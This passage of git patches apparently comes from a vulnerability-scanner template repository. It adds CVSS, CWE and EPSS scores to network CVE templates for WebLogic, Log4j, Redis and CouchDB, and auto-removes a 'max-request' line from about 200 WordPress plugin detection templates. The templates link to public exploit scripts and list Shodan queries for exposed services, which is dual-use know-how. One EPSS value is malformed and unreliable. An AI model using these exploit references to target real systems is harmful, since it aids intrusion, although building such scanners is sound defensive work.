2 diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 88f99004c2..ed5150ef7e 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -8,6 +8,12 @@ info: Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. reference: - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-3510 + cwe-id: CWE-119 + epss-score: 0.0162000000.016200000 metadata: max-request: 2 verified: true diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index eed23e98a7..8297b4cd69 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -10,7 +10,11 @@ info: - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 - https://nvd.nist.gov/vuln/detail/CVE-2017-5645 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2017-5645 + cwe-id: CWE-502 + epss-score: 0.768230000 metadata: max-request: 2 tags: vulhub,network,apache,log4j,rce,deserialization,oast diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 1ae8ee9f6d..0ab966761a 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -16,6 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-2628 cwe-id: CWE-502 + epss-score: 0.975310000 tags: cve,cve2018,oracle,weblogic,network,deserialization,kev metadata: max-request: 1 diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 5396779511..ba0ef0cb83 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -15,6 +15,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2893 + epss-score: 0.973460000 metadata: max-request: 2 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index ead3253e1c..9a7221f7e4 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -14,6 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 + epss-score: 0.936930000 metadata: max-request: 2 shodan-query: product:"redis" diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 6963a27607..9e68ec99ba 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -10,6 +10,12 @@ info: - https://www.exploit-db.com/exploits/50914 - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2022-24706 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24706 + cwe-id: CWE-1188 + epss-score: 0.974070000 metadata: max-request: 2 shodan-query: product:"CouchDB" From d14caf637205baef4ad0ac3623b250a8d45fd3f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 04:02:25 +0000 Subject: [PATCH 553/609] Auto WordPress Plugins Update [Mon Jul 10 04:02:25 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 200 files changed, 200 deletions(-) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - 